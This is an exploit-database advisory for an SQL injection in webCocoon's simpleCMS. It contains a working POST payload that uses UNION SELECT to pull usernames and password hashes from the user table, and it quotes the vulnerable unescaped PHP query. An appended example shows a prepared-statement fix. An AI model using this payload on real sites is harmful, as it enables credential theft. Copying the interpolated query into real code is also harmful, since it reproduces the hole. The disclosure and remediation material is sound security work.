
webCocoon's simpleCMS - SQL Injection

Author: _İNFAZCI_
type: webapps
platform: php
port: 
date_added: 2009-12-20 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsimpleCMS.zip

#############################################################
# webCocoon's simpleCMS Vulnerability

# Plugin Home: http://webcocoon.wordpress.com

# Author:_İNFAZCI_

# Site: www.1923turk.biz

##############################################################

# Exploit:


Vuln file: /content/post/show.php


Exploit:


POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=xek' union select null,concat_ws(0x3a,username,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null from user -- &mode=post&gfile=show




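//Show post
// $id reaches this query from the request's id parameter and is placed inside
// the quoted literal unescaped, so a single quote in id ends the string and
// the remainder is parsed as SQL.
$get_post = mysql_query("SELECT * FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result = mysql_num_rows($get_post);
$post = mysql_fetch_array($get_post);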
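
The query above builds its SQL by interpolating $id into the string. As an added example (not part of the original advisory and not simpleCMS code), here is the same "show post" lookup with a bound parameter. Assumptions: PDO with an in-memory SQLite database stands in for the CMS's MySQL backend so the script runs offline, and the function name, table layout and rows are constructed for illustration.

```php
<?php
// Added example: hardened form of the "Show post" lookup.
// Hypothetical helper name; schema and rows below are constructed.

function find_published_post(PDO $db, string $id): ?array
{
    // The placeholder keeps $id out of the SQL text entirely. The driver
    // passes it as data, so quotes and UNION keywords are never parsed as SQL.
    $stmt = $db->prepare(
        "SELECT post_id, title, body FROM post
         WHERE post_id = :id AND status = 'published'"
    );
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// On MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so that binding
// is done by the server rather than by client-side string substitution.

$db->exec("CREATE TABLE post (post_id TEXT, title TEXT, body TEXT, status TEXT)");
$db->exec("CREATE TABLE user (username TEXT, password TEXT)");
$db->exec("INSERT INTO post VALUES ('1', 'Hello', 'First post', 'published')");
$db->exec("INSERT INTO post VALUES ('2', 'Draft', 'Not yet', 'draft')");
$db->exec("INSERT INTO user VALUES ('admin', 'constructed-hash')");

$inputs = [
    '1',                                                       // normal request
    '2',                                                       // draft stays hidden
    "xek' union select username,password,null from user -- ", // injection-shaped id
];

foreach ($inputs as $id) {
    $post = find_published_post($db, $id);
    // The injection-shaped id is compared as one literal string and matches no row.
    printf("%-62s => %s\n", json_encode($id), $post ? $post['title'] : 'no post');
}
```

Only the first input returns a post. The third is compared against post_id as a single string value, so the user table is never read.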